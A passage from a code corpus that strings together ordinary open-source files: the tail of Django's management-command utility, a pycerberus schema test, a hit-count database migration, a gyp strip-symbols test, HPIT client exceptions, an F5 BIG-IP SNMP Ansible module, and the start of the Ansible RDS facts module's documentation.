    If ``commands_only`` is True, return just the sorted command names,
    one per line; otherwise return the full usage text with the commands
    grouped by the application that provides them.
    """
    if commands_only:
        usage = sorted(get_commands().keys())
    else:
        usage = [
            "",
            "Type '%s help <subcommand>' for help on a specific subcommand." % self.prog_name,
            "",
            "Available subcommands:",
        ]
        # Group command names by the (abbreviated) app name providing them.
        commands_dict = defaultdict(lambda: [])
        for name, app in get_commands().items():
            if app == 'django.core':
                app = 'django'
            else:
                app = app.rpartition('.')[-1]
            commands_dict[app].append(name)
        style = color_style()
        for app in sorted(commands_dict.keys()):
            usage.append("")
            usage.append(style.NOTICE("[%s]" % app))
            for name in sorted(commands_dict[app]):
                usage.append("    %s" % name)
        # Output an extra note if settings are not properly configured
        if self.settings_exception is not None:
            usage.append(style.NOTICE(
                "Note that only Django core commands are listed "
                "as settings are not properly configured (error: %s)."
                % self.settings_exception))

    return '\n'.join(usage)
def fetch_command(self, subcommand):
"""
Try to fetch the given subcommand, printing a message with the
appropriate command called from the command line (usually
"django-admin" or "manage.py") if it can't be found.
"""
# Get commands outside of try block to prevent swallowing exceptions
commands = get_commands()
try:
app_name = commands[subcommand]
except KeyError:
if os.environ.get('DJANGO_SETTINGS_MODULE'):
# If `subcommand` is missing due to misconfigured settings, the
# following line will retrigger an ImproperlyConfigured exception
# (get_commands() swallows the original one) so the user is
# informed about it.
settings.INSTALLED_APPS
else:
sys.stderr.write("No Django settings specified.\n")
sys.stderr.write(
"Unknown command: %r\nType '%s help' for usage.\n"
% (subcommand, self.prog_name)
)
sys.exit(1)
if isinstance(app_name, BaseCommand):
# If the command is already loaded, use it directly.
klass = app_name
else:
klass = load_command_class(app_name, subcommand)
return klass
def autocomplete(self):
"""
Output completion suggestions for BASH.
The output of this function is passed to BASH's `COMREPLY` variable and
treated as completion suggestions. `COMREPLY` expects a space
separated string as the result.
The `COMP_WORDS` and `COMP_CWORD` BASH environment variables are used
to get information about the cli input. Please refer to the BASH
man-page for more information about this variables.
Subcommand options are saved as pairs. A pair consists of
the long option string (e.g. '--exclude') and a boolean
value indicating if the option requires arguments. When printing to
stdout, an equal sign is appended to options which require arguments.
Note: If debugging this function, it is recommended to write the debug
output in a separate file. Otherwise the debug output will be treated
and formatted as potential completion suggestions.
"""
# Don't complete if user hasn't sourced bash_completion file.
if 'DJANGO_AUTO_COMPLETE' not in os.environ:
return
cwords = os.environ['COMP_WORDS'].split()[1:]
cword = int(os.environ['COMP_CWORD'])
try:
curr = cwords[cword - 1]
except IndexError:
curr = ''
subcommands = list(get_commands()) + ['help']
options = [('--help', False)]
# subcommand
if cword == 1:
print(' '.join(sorted(filter(lambda x: x.startswith(curr), subcommands))))
# subcommand options
# special case: the 'help' subcommand has no options
elif cwords[0] in subcommands and cwords[0] != 'help':
subcommand_cls = self.fetch_command(cwords[0])
# special case: add the names of installed apps to options
if cwords[0] in ('dumpdata', 'sqlmigrate', 'sqlsequencereset', 'test'):
try:
app_configs = apps.get_app_configs()
# Get the last part of the dotted path as the app name.
options.extend((app_config.label, 0) for app_config in app_configs)
except ImportError:
# Fail silently if DJANGO_SETTINGS_MODULE isn't set. The
# user will find out once they execute the command.
pass
parser = subcommand_cls.create_parser('', cwords[0])
options.extend(
(min(s_opt.option_strings), s_opt.nargs != 0)
for s_opt in parser._actions if s_opt.option_strings
)
# filter out previously specified options from available options
prev_opts = {x.split('=')[0] for x in cwords[1:cword - 1]}
options = (opt for opt in options if opt[0] not in prev_opts)
# filter options by current input
options = sorted((k, v) for k, v in options if k.startswith(curr))
for opt_label, require_arg in options:
# append '=' to options which require args
if require_arg:
opt_label += '='
print(opt_label)
# Exit code of the bash completion function is never passed back to
# the user, so it's safe to always exit with 0.
# For more details see #25420.
sys.exit(0)
def execute(self):
"""
Given the command-line arguments, figure out which subcommand is being
run, create a parser appropriate to that command, and run it.
"""
try:
subcommand = self.argv[1]
except IndexError:
subcommand = 'help' # Display help if no arguments were given.
# Preprocess options to extract --settings and --pythonpath.
# These options could affect the commands that are available, so they
# must be processed early.
parser = CommandParser(None, usage="%(prog)s subcommand [options] [args]", add_help=False)
parser.add_argument('--settings')
parser.add_argument('--pythonpath')
parser.add_argument('args', nargs='*') # catch-all
try:
options, args = parser.parse_known_args(self.argv[2:])
handle_default_options(options)
except CommandError:
pass # Ignore any option errors at this point.
try:
settings.INSTALLED_APPS
except ImproperlyConfigured as exc:
self.settings_exception = exc
if settings.configured:
# Start the auto-reloading dev server even if the code is broken.
# The hardcoded condition is a code smell but we can't rely on a
# flag on the command class because we haven't located it yet.
if subcommand == 'runserver' and '--noreload' not in self.argv:
try:
autoreload.check_errors(django.setup)()
except Exception:
# The exception will be raised later in the child process
# started by the autoreloader. Pretend it didn't happen by
# loading an empty list of applications.
apps.all_models = defaultdict(OrderedDict)
apps.app_configs = OrderedDict()
apps.apps_ready = apps.models_ready = apps.ready = True
# Remove options not compatible with the built-in runserver
# (e.g. options for the contrib.staticfiles' runserver).
# Changes here require manually testing as described in
# #27522.
_parser = self.fetch_command('runserver').create_parser('django', 'runserver')
_options, _args = _parser.parse_known_args(self.argv[2:])
for _arg in _args:
self.argv.remove(_arg)
# In all other cases, django.setup() is required to succeed.
else:
django.setup()
self.autocomplete()
if subcommand == 'help':
if '--commands' in args:
sys.stdout.write(self.main_help_text(commands_only=True) + '\n')
elif len(options.args) < 1:
sys.stdout.write(self.main_help_text() + '\n')
else:
self.fetch_command(options.args[0]).print_help(self.prog_name, options.args[0])
# Special-cases: We want 'django-admin --version' and
# 'django-admin --help' to work, for backwards compatibility.
elif subcommand == 'version' or self.argv[1:] == ['--version']:
sys.stdout.write(django.get_version() + '\n')
elif self.argv[1:] in (['--help'], ['-h']):
sys.stdout.write(self.main_help_text() + '\n')
else:
self.fetch_command(subcommand).run_from_argv(self.argv)
def execute_from_command_line(argv=None):
    """Build a ManagementUtility for *argv* (default: sys.argv) and run it."""
    ManagementUtility(argv).execute()
| bsd-3-clause |
hhru/pycerberus-deb | tests/extend_schemas_test.py | 2 | 3775 | # -*- coding: UTF-8 -*-
#
# The MIT License
#
# Copyright (c) 2010 Felix Schwarz <felix.schwarz@oss.schwarz.eu>
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
from pycerberus.api import Validator
from pycerberus.compat import set
from pycerberus.lib import PythonicTestCase
from pycerberus.schema import SchemaValidator
from pycerberus.validators import StringValidator
class ExtendSchemaTest(PythonicTestCase):
    """Exercise extending one SchemaValidator with validators from another,
    both imperatively (add_missing_validators) and declaratively (subclassing).
    """

    class BasicSchema(SchemaValidator):
        id = Validator()
        formvalidators = (Validator(), )

    # --- helpers ---------------------------------------------------------

    def schema_class(self):
        return self.__class__.BasicSchema

    def schema(self):
        schema_cls = self.schema_class()
        return schema_cls()

    def known_fields(self, schema):
        return set(schema.fieldvalidators().keys())

    # --- tests -----------------------------------------------------------

    def test_can_add_additional_validators_to_existing_schema(self):
        base = self.schema()
        extended = SchemaValidator()
        extended.add('name', StringValidator())
        extended.add_missing_validators(base)
        # The extended schema gains the base field without losing its own.
        self.assert_equals(set(['id', 'name']), self.known_fields(extended))
        self.assert_length(1, base.formvalidators())

    def test_existing_keys_are_kept(self):
        base = self.schema()
        extended = SchemaValidator()
        extended.add('id', StringValidator())
        extended.add_missing_validators(base)
        # The base schema is untouched and the extended schema keeps its own
        # validator for the duplicated key.
        self.assert_equals(set(['id']), self.known_fields(base))
        self.assert_isinstance(extended.validator_for('id'), StringValidator)

    def test_adding_validators_appends_formvalidators(self):
        base = self.schema()
        extended = SchemaValidator()
        extended.add('id', StringValidator())
        extended.add_formvalidator(StringValidator())
        extended.add_missing_validators(base)
        self.assert_length(2, extended.formvalidators())

    def test_can_add_validators_from_schema_in_a_declarative_way(self):
        class ExtendedSchema(self.schema_class()):
            name = StringValidator()
            formvalidators = (StringValidator(), )

        extended = ExtendedSchema()
        self.assert_equals(set(['id', 'name']), self.known_fields(extended))
        self.assert_length(2, extended.formvalidators())
        self.assert_isinstance(extended.formvalidators()[1], StringValidator)

    def test_existing_names_from_superclass_are_replaced(self):
        class ExtendedSchema(self.schema_class()):
            id = StringValidator()

        extended = ExtendedSchema()
        self.assert_isinstance(extended.validator_for('id'), StringValidator)
| mit |
Connexions/cnx-upgrade | cnxupgrade/upgrades/migrate_hit_counts/migration.py | 1 | 2971 | # -*- coding: utf-8 -*-
# ###
# Copyright (c) 2013, Rice University
# This software is subject to the provisions of the GNU Affero General
# Public License version 3 (AGPLv3).
# See LICENCE.txt for details.
# ###
"""\
Migrates hit counts from legacy to cnx-archive's database at
schema version 1.
"""
import os
import sys
import csv
import argparse
from datetime import datetime, timedelta
import psycopg2
__all__ = ('cli_loader', 'do_migration',)
here = os.path.abspath(os.path.dirname(__file__))
RESOURCES_DIRECTORY = os.path.join(here, 'resources')
EXTRACTION_SCRIPT_PATH = os.path.join(RESOURCES_DIRECTORY, 'hit_extractor.py')
def get_ident(legacy_id, cursor):
    """Look up the ``module_ident`` for a legacy module id.

    Returns None when ``latest_modules`` has no row for *legacy_id*.
    """
    cursor.execute("SELECT module_ident FROM latest_modules "
                   "WHERE moduleid = %s", (legacy_id,))
    row = cursor.fetchone()
    return None if row is None else row[0]
def do_migration(hits, db_connection):
    """Given a list of hit objects migrate them to the SQL document_hits
    table.

    ``hits`` is a sequence of ``(legacy_id, info)`` pairs, where ``info`` is
    ``[past_hits, recent_hits, start, end, interval]`` with ``start``/``end``
    as seconds-since-epoch and ``interval`` in seconds. Legacy ids with no
    matching ``latest_modules`` row are skipped. Commits at the end.
    """
    with db_connection.cursor() as cursor:
        for legacy_id, info in hits:
            document_id = get_ident(legacy_id, cursor)
            if document_id is None:
                # Content never made it into the archive; nothing to record.
                continue
            past_hits, recent_hits, start, end, interval = info
            start = datetime.fromtimestamp(start)
            end = datetime.fromtimestamp(end)
            interval = timedelta(seconds=interval)
            # Hits older than the most recent interval go into one bucket
            # spanning [start, end - interval); only written when there is a
            # real pre-interval window and a positive count.
            if start < end - interval and (past_hits - recent_hits) > 0:
                # Insert past hits
                payload = (document_id, start, end - interval,
                           past_hits - recent_hits,)
                cursor.execute("INSERT into document_hits "
                               "VALUES (%s, %s, %s, %s)",
                               payload)
            # Insert recent hits
            # Pre-ternary and/or idiom: start if start > end - interval else
            # end - interval. Safe here because both operands are datetimes
            # (always truthy).
            start = start > end - interval and start or end - interval
            payload = (document_id, start, end, recent_hits,)
            cursor.execute("INSERT into document_hits "
                           "VALUES (%s, %s, %s, %s)",
                           payload)
        # Lastly, update the optimization tables.
        cursor.execute("SELECT update_hit_ranks();")
    db_connection.commit()
def cli_command(**kwargs):
    """Entry point used by the CLI to run the hit-count migration."""
    connection_string = kwargs['db_conn_str']
    csv_input = kwargs['input']
    # Each CSV row is: legacy_id followed by integer hit/timestamp fields.
    hits = []
    for row in csv.reader(csv_input):
        hits.append((row[0], [int(value) for value in row[1:]]))
    with psycopg2.connect(connection_string) as db_connection:
        do_migration(hits, db_connection)
def cli_loader(parser):
    """Used to load the CLI toggles and switches."""
    help_text = ("CSV extracted using '{}' on the zope instance"
                 .format(EXTRACTION_SCRIPT_PATH))
    parser.add_argument('--input',
                        type=argparse.FileType('r'),
                        default=sys.stdin,
                        help=help_text)
    return cli_command
| agpl-3.0 |
sanyaade-teachings/gyp | test/mac/gyptest-strip-default.py | 232 | 2448 | #!/usr/bin/env python
# Copyright (c) 2013 Google Inc. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""
Verifies that the default STRIP_STYLEs match between different generators.
"""
import TestGyp
import re
import subprocess
import sys
import time
if sys.platform == 'darwin':
  test = TestGyp.TestGyp(formats=['ninja', 'make', 'xcode'])

  CHDIR='strip'
  test.run_gyp('test-defaults.gyp', chdir=CHDIR)
  test.build('test-defaults.gyp', test.ALL, chdir=CHDIR)

  # Lightweight check if stripping was done.
  def OutPath(s):
    # Resolve a built product name to its path inside the build directory.
    return test.built_file_path(s, chdir=CHDIR)

  def CheckNsyms(p, o_expected):
    # Dump the symbol table of binary `p` with nm, normalize it, and compare
    # against the expected listing; fails the test on mismatch.
    proc = subprocess.Popen(['nm', '-aU', p], stdout=subprocess.PIPE)
    o = proc.communicate()[0]

    # Filter out mysterious "00 0000 OPT radr://5614542" symbol which
    # is apparently only printed on the bots (older toolchain?).
    # Yes, "radr", not "rdar".
    o = ''.join(filter(lambda s: 'radr://5614542' not in s, o.splitlines(True)))
    # Normalize: fold 'A' (absolute) markers into 'T' and mask the leading
    # hex addresses so the comparison is layout-independent.
    o = o.replace('A', 'T')
    o = re.sub(r'^[a-fA-F0-9]+', 'XXXXXXXX', o, flags=re.MULTILINE)
    assert not proc.returncode
    if o != o_expected:
      print 'Stripping: Expected symbols """\n%s""", got """\n%s"""' % (
          o_expected, o)
      test.fail_test()

  # Dylibs/bundles keep their exported symbols; hidden ones stay local.
  CheckNsyms(OutPath('libsingle_dylib.dylib'),
             """\
XXXXXXXX S _ci
XXXXXXXX S _i
XXXXXXXX T _the_function
XXXXXXXX t _the_hidden_function
XXXXXXXX T _the_used_function
XXXXXXXX T _the_visible_function
""")
  CheckNsyms(OutPath('single_so.so'),
             """\
XXXXXXXX S _ci
XXXXXXXX S _i
XXXXXXXX T _the_function
XXXXXXXX t _the_hidden_function
XXXXXXXX T _the_used_function
XXXXXXXX T _the_visible_function
""")
  # Executables are stripped down to the Mach-O header symbol.
  CheckNsyms(OutPath('single_exe'),
             """\
XXXXXXXX T __mh_execute_header
""")

  CheckNsyms(test.built_file_path(
      'bundle_dylib.framework/Versions/A/bundle_dylib', chdir=CHDIR),
             """\
XXXXXXXX S _ci
XXXXXXXX S _i
XXXXXXXX T _the_function
XXXXXXXX t _the_hidden_function
XXXXXXXX T _the_used_function
XXXXXXXX T _the_visible_function
""")
  CheckNsyms(test.built_file_path(
      'bundle_so.bundle/Contents/MacOS/bundle_so', chdir=CHDIR),
             """\
XXXXXXXX S _ci
XXXXXXXX S _i
XXXXXXXX T _the_function
XXXXXXXX T _the_used_function
XXXXXXXX T _the_visible_function
""")
  CheckNsyms(test.built_file_path(
      'bundle_exe.app/Contents/MacOS/bundle_exe', chdir=CHDIR),
             """\
XXXXXXXX T __mh_execute_header
""")

  test.pass_test()
| bsd-3-clause |
adlnet/HPIT-python-client | hpitclient/exceptions.py | 2 | 1439 | class ConnectionError(Exception):
"""
This exception indicates a generic HPIT connection problem.
"""
class AuthenticationError(Exception):
    """Raised when HPIT answers a request with HTTP 403 (not authenticated)."""
class AuthorizationError(Exception):
    """Raised when an authorization grant is requested for a message type or
    resource that the caller does not own.
    """
class ResourceNotFoundError(Exception):
    """Raised when HPIT reports that the requested resource does not exist.

    NOTE(review): the upstream docstring said "HPIT 403", identical to
    AuthenticationError -- likely a copy/paste of the wrong status code;
    confirm whether this corresponds to a 404.
    """
class InternalServerError(Exception):
    """Raised when HPIT answers a request with HTTP 500."""
class PluginRegistrationError(Exception):
    """Raised when a plugin fails to register itself with HPIT."""
class PluginPollError(Exception):
    """Raised when a plugin cannot poll HPIT."""
class ResponseDispatchError(Exception):
    """Raised when a response received from HPIT cannot be dispatched to a
    callback.
    """
class InvalidMessageNameException(Exception):
    """Raised when a caller attempts to use a reserved system message name,
    such as 'transaction'.
    """
class InvalidParametersError(Exception):
    """Raised when a call does not meet a function's parameter requirements."""
class BadCallbackException(Exception):
    """Raised when a supplied callback is not callable."""
| mit |
EvanK/ansible | lib/ansible/modules/network/f5/bigip_snmp.py | 14 | 13143 | #!/usr/bin/python
# -*- coding: utf-8 -*-
#
# Copyright: (c) 2017, F5 Networks Inc.
# GNU General Public License v3.0 (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['stableinterface'],
'supported_by': 'certified'}
DOCUMENTATION = r'''
---
module: bigip_snmp
short_description: Manipulate general SNMP settings on a BIG-IP
description:
- Manipulate general SNMP settings on a BIG-IP.
version_added: 2.4
options:
allowed_addresses:
description:
- Configures the IP addresses of the SNMP clients from which the snmpd
daemon accepts requests.
- This value can be hostnames, IP addresses, or IP networks.
- You may specify a single list item of C(default) to set the value back
to the system's default of C(127.0.0.0/8).
- You can remove all allowed addresses by either providing the word C(none), or
by providing the empty string C("").
version_added: 2.6
contact:
description:
- Specifies the name of the person who administers the SNMP
service for this system.
agent_status_traps:
description:
- When C(enabled), ensures that the system sends a trap whenever the
SNMP agent starts running or stops running. This is usually enabled
by default on a BIG-IP.
choices:
- enabled
- disabled
agent_authentication_traps:
description:
- When C(enabled), ensures that the system sends authentication warning
traps to the trap destinations. This is usually disabled by default on
a BIG-IP.
choices:
- enabled
- disabled
device_warning_traps:
description:
- When C(enabled), ensures that the system sends device warning traps
to the trap destinations. This is usually enabled by default on a
BIG-IP.
choices:
- enabled
- disabled
location:
description:
- Specifies the description of this system's physical location.
extends_documentation_fragment: f5
author:
- Tim Rupp (@caphrim007)
- Wojciech Wypior (@wojtek0806)
'''
EXAMPLES = r'''
- name: Set snmp contact
bigip_snmp:
contact: Joe User
provider:
password: secret
server: lb.mydomain.com
user: admin
delegate_to: localhost
- name: Set snmp location
bigip_snmp:
location: US West 1
provider:
password: secret
server: lb.mydomain.com
user: admin
delegate_to: localhost
'''
RETURN = r'''
agent_status_traps:
description: Value that the agent status traps was set to.
returned: changed
type: str
sample: enabled
agent_authentication_traps:
description: Value that the authentication status traps was set to.
returned: changed
type: str
sample: enabled
device_warning_traps:
description: Value that the warning status traps was set to.
returned: changed
type: str
sample: enabled
contact:
description: The new value for the person who administers SNMP on the device.
returned: changed
type: str
sample: Joe User
location:
description: The new value for the system's physical location.
returned: changed
type: str
sample: US West 1a
allowed_addresses:
description: The new allowed addresses for SNMP client connections.
returned: changed
type: list
sample: ['127.0.0.0/8', 'foo.bar.com', '10.10.10.10']
'''
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils.six import string_types
try:
from library.module_utils.network.f5.bigip import F5RestClient
from library.module_utils.network.f5.common import F5ModuleError
from library.module_utils.network.f5.common import AnsibleF5Parameters
from library.module_utils.network.f5.common import cleanup_tokens
from library.module_utils.network.f5.common import f5_argument_spec
from library.module_utils.network.f5.common import transform_name
from library.module_utils.network.f5.common import exit_json
from library.module_utils.network.f5.common import fail_json
from library.module_utils.compat.ipaddress import ip_network
from library.module_utils.network.f5.common import is_valid_hostname
except ImportError:
from ansible.module_utils.network.f5.bigip import F5RestClient
from ansible.module_utils.network.f5.common import F5ModuleError
from ansible.module_utils.network.f5.common import AnsibleF5Parameters
from ansible.module_utils.network.f5.common import cleanup_tokens
from ansible.module_utils.network.f5.common import f5_argument_spec
from ansible.module_utils.network.f5.common import transform_name
from ansible.module_utils.network.f5.common import exit_json
from ansible.module_utils.network.f5.common import fail_json
from ansible.module_utils.compat.ipaddress import ip_network
from ansible.module_utils.network.f5.common import is_valid_hostname
class Parameters(AnsibleF5Parameters):
    # Maps REST API attribute names (camelCase) to the module's snake_case
    # option names.
    api_map = {
        'agentTrap': 'agent_status_traps',
        'authTrap': 'agent_authentication_traps',
        'bigipTraps': 'device_warning_traps',
        'sysLocation': 'location',
        'sysContact': 'contact',
        'allowedAddresses': 'allowed_addresses',
    }

    # Options diffed between desired (want) and current (have) state.
    updatables = [
        'agent_status_traps',
        'agent_authentication_traps',
        'device_warning_traps',
        'location',
        'contact',
        'allowed_addresses',
    ]

    # Values reported back to the user when they change.
    returnables = [
        'agent_status_traps',
        'agent_authentication_traps',
        'device_warning_traps',
        'location', 'contact',
        'allowed_addresses',
    ]

    # Attribute names included in payloads sent to the REST API.
    api_attributes = [
        'agentTrap',
        'authTrap',
        'bigipTraps',
        'sysLocation',
        'sysContact',
        'allowedAddresses',
    ]
class ApiParameters(Parameters):
    @property
    def allowed_addresses(self):
        """Device-reported allowed SNMP client addresses, de-duplicated and
        sorted for stable comparison."""
        addresses = self._values['allowed_addresses']
        if addresses is None:
            return None
        return sorted(set(addresses))
class ModuleParameters(Parameters):
    @property
    def allowed_addresses(self):
        """Normalize the user-supplied allowed_addresses option.

        Accepts a string or a list. The string '' or 'none' means "remove all
        allowed addresses" ([]); a single-item list of 'default' restores the
        system default of 127.0.0.0/8. Entries must be valid IPs/networks or
        reasonably well formed hostnames, otherwise F5ModuleError is raised.
        The result is de-duplicated and sorted.

        NOTE(review): a one-element list [''] maps to the default
        ['127.0.0.0/8'], whereas the bare string '' maps to [] -- confirm this
        asymmetry is intended.
        """
        if self._values['allowed_addresses'] is None:
            return None
        result = []
        addresses = self._values['allowed_addresses']
        if isinstance(addresses, string_types):
            if addresses in ['', 'none']:
                return []
            else:
                addresses = [addresses]
        if len(addresses) == 1 and addresses[0] in ['default', '']:
            result = ['127.0.0.0/8']
            return result
        for address in addresses:
            try:
                # Check for valid IPv4 or IPv6 entries
                ip_network(u'%s' % str(address))
                result.append(address)
            except ValueError:
                # else fallback to checking reasonably well formatted hostnames
                if is_valid_hostname(address):
                    result.append(str(address))
                    continue
                raise F5ModuleError(
                    "The provided 'allowed_address' value {0} is not a valid IP or hostname".format(address)
                )
        result = list(set(result))
        result.sort()
        return result
class Changes(Parameters):
    def to_return(self):
        """Return a dict of the returnable parameters, filtered for output.

        NOTE: the broad ``except Exception`` means that if any property
        raises, a partial (or empty) dict is returned rather than failing
        the module run.
        """
        result = {}
        try:
            for returnable in self.returnables:
                result[returnable] = getattr(self, returnable)
            result = self._filter_params(result)
        except Exception:
            pass
        return result
class UsableChanges(Changes):
    """Staged changes in the form submitted to the device API."""
class ReportableChanges(Changes):
    """Changes in the form reported back to the Ansible user."""
class Difference(object):
    """Compute per-option differences between desired (want) and current
    (have) parameters. ``compare`` returns the changed value, or None when
    nothing changed."""

    def __init__(self, want, have=None):
        self.want = want
        self.have = have

    def compare(self, param):
        # Use a specialized property when one is defined on this class,
        # otherwise fall back to the generic comparison.
        try:
            return getattr(self, param)
        except AttributeError:
            return self.__default(param)

    def __default(self, param):
        # Generic rule: report the wanted value when it differs from (or has
        # no counterpart in) the current state; implicit None otherwise.
        wanted = getattr(self.want, param)
        try:
            if wanted != getattr(self.have, param):
                return wanted
        except AttributeError:
            return wanted

    @property
    def allowed_addresses(self):
        if self.want.allowed_addresses is None:
            return None
        if self.have.allowed_addresses is None:
            if self.want.allowed_addresses:
                return self.want.allowed_addresses
            return None
        wanted = set(self.want.allowed_addresses)
        current = set(self.have.allowed_addresses)
        if wanted != current:
            return sorted(wanted)
class ModuleManager(object):
    """Orchestrates reading current SNMP settings from the device, diffing
    them against the desired state, and applying updates."""

    def __init__(self, *args, **kwargs):
        self.module = kwargs.get('module', None)
        self.client = kwargs.get('client', None)
        # 'have' is populated from the device in update(); 'want' comes from
        # the user's module parameters.
        self.have = ApiParameters()
        self.want = ModuleParameters(params=self.module.params)
        self.changes = UsableChanges()

    def _update_changed_options(self):
        """Diff want vs have and stage differences into self.changes.

        Returns True when at least one option changed.
        """
        diff = Difference(self.want, self.have)
        updatables = Parameters.updatables
        changed = dict()
        for k in updatables:
            change = diff.compare(k)
            if change is None:
                continue
            else:
                if isinstance(change, dict):
                    changed.update(change)
                else:
                    changed[k] = change
        if changed:
            self.changes = UsableChanges(params=changed)
            return True
        return False

    def exec_module(self):
        """Module entry point: apply updates and build the result dict."""
        result = dict()
        changed = self.update()
        reportable = ReportableChanges(params=self.changes.to_return())
        changes = reportable.to_return()
        result.update(**changes)
        result.update(dict(changed=changed))
        self._announce_deprecations(result)
        return result

    def _announce_deprecations(self, result):
        # Surface any '__warnings' collected during processing as Ansible
        # deprecation messages.
        warnings = result.pop('__warnings', [])
        for warning in warnings:
            self.module.deprecate(
                msg=warning['msg'],
                version=warning['version']
            )

    def should_update(self):
        result = self._update_changed_options()
        if result:
            return True
        return False

    def update(self):
        """Read device state and apply changes; honors check mode."""
        self.have = self.read_current_from_device()
        if not self.should_update():
            return False
        if self.module.check_mode:
            return True
        self.update_on_device()
        return True

    def read_current_from_device(self):
        """GET the device's current SNMP settings as ApiParameters."""
        uri = "https://{0}:{1}/mgmt/tm/sys/snmp/".format(
            self.client.provider['server'],
            self.client.provider['server_port'],
        )
        resp = self.client.api.get(uri)
        try:
            response = resp.json()
        except ValueError as ex:
            raise F5ModuleError(str(ex))
        # The REST API reports errors via a 'code' field in the JSON body.
        if 'code' in response and response['code'] == 400:
            if 'message' in response:
                raise F5ModuleError(response['message'])
            else:
                raise F5ModuleError(resp.content)
        return ApiParameters(params=response)

    def update_on_device(self):
        """PATCH the staged changes to the device's SNMP endpoint."""
        params = self.changes.api_params()
        uri = "https://{0}:{1}/mgmt/tm/sys/snmp/".format(
            self.client.provider['server'],
            self.client.provider['server_port'],
        )
        resp = self.client.api.patch(uri, json=params)
        try:
            response = resp.json()
        except ValueError as ex:
            raise F5ModuleError(str(ex))
        if 'code' in response and response['code'] == 400:
            if 'message' in response:
                raise F5ModuleError(response['message'])
            else:
                raise F5ModuleError(resp.content)
class ArgumentSpec(object):
    """Builds the AnsibleModule argument specification for bigip_snmp."""

    def __init__(self):
        self.supports_check_mode = True
        self.choices = ['enabled', 'disabled']
        # The three trap toggles share the same enabled/disabled choices.
        trap_option = dict(choices=self.choices)
        module_args = {
            'contact': dict(),
            'agent_status_traps': dict(trap_option),
            'agent_authentication_traps': dict(trap_option),
            'device_warning_traps': dict(trap_option),
            'location': dict(),
            'allowed_addresses': dict(type='raw'),
        }
        # Common F5 connection arguments first, then module-specific ones.
        self.argument_spec = {}
        self.argument_spec.update(f5_argument_spec)
        self.argument_spec.update(module_args)
def main():
    """Instantiate the module and run the manager, reporting via exit_json
    or fail_json."""
    spec = ArgumentSpec()
    module = AnsibleModule(
        argument_spec=spec.argument_spec,
        supports_check_mode=spec.supports_check_mode
    )
    client = F5RestClient(**module.params)
    try:
        mm = ModuleManager(module=module, client=client)
        results = mm.exec_module()
        # Discard the REST auth token before exiting, success or failure.
        cleanup_tokens(client)
        exit_json(module, results, client)
    except F5ModuleError as ex:
        cleanup_tokens(client)
        fail_json(module, ex, client)

if __name__ == '__main__':
    main()
| gpl-3.0 |
alexlo03/ansible | lib/ansible/modules/cloud/amazon/rds_instance_facts.py | 27 | 12113 | #!/usr/bin/python
# Copyright (c) 2017, 2018 Michael De La Rue
# Copyright (c) 2017, 2018 Will Thames
# Copyright (c) 2017 Ansible Project
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
ANSIBLE_METADATA = {'status': ['preview'],
'supported_by': 'community',
'metadata_version': '1.1'}
DOCUMENTATION = '''
---
module: rds_instance_facts
version_added: "2.6"
short_description: obtain facts about one or more RDS instances
description:
- obtain facts about one or more RDS instances
options:
db_instance_identifier:
description:
- The RDS instance's unique identifier.
required: false
aliases:
- id
filters:
description:
- A filter that specifies one or more DB instances to describe.
See U(https://docs.aws.amazon.com/AmazonRDS/latest/APIReference/API_DescribeDBInstances.html)
requirements:
- "python >= 2.7"
- "boto3"
author:
- "Will Thames (@willthames)"
- "Michael De La Rue (@mikedlr)"
extends_documentation_fragment:
- aws
- ec2
'''
EXAMPLES = '''
# Get facts about an instance
- rds_instance_facts:
db_instance_identifier: new-database
register: new_database_facts
# Get all RDS instances
- rds_instance_facts:
'''
RETURN = '''
instances:
description: List of RDS instances
returned: always
type: complex
contains:
allocated_storage:
description: Gigabytes of storage allocated to the database
returned: always
type: int
sample: 10
auto_minor_version_upgrade:
description: Whether minor version upgrades happen automatically
returned: always
type: bool
sample: true
availability_zone:
description: Availability Zone in which the database resides
returned: always
type: string
sample: us-west-2b
backup_retention_period:
description: Days for which backups are retained
returned: always
type: int
sample: 7
ca_certificate_identifier:
description: ID for the CA certificate
returned: always
type: string
sample: rds-ca-2015
copy_tags_to_snapshot:
description: Whether DB tags should be copied to the snapshot
returned: always
type: bool
sample: false
db_instance_arn:
description: ARN of the database instance
returned: always
type: string
sample: arn:aws:rds:us-west-2:111111111111:db:helloworld-rds
db_instance_class:
description: Instance class of the database instance
returned: always
type: string
sample: db.t2.small
db_instance_identifier:
description: Database instance identifier
returned: always
type: string
sample: helloworld-rds
db_instance_port:
description: Port used by the database instance
returned: always
type: int
sample: 0
db_instance_status:
description: Status of the database instance
returned: always
type: string
sample: available
db_name:
description: Name of the database
returned: always
type: string
sample: management
db_parameter_groups:
description: List of database parameter groups
returned: always
type: complex
contains:
db_parameter_group_name:
description: Name of the database parameter group
returned: always
type: string
sample: psql-pg-helloworld
parameter_apply_status:
description: Whether the parameter group has been applied
returned: always
type: string
sample: in-sync
db_security_groups:
description: List of security groups used by the database instance
returned: always
type: list
sample: []
db_subnet_group:
description: list of subnet groups
returned: always
type: complex
contains:
db_subnet_group_description:
description: Description of the DB subnet group
returned: always
type: string
sample: My database subnet group
db_subnet_group_name:
description: Name of the database subnet group
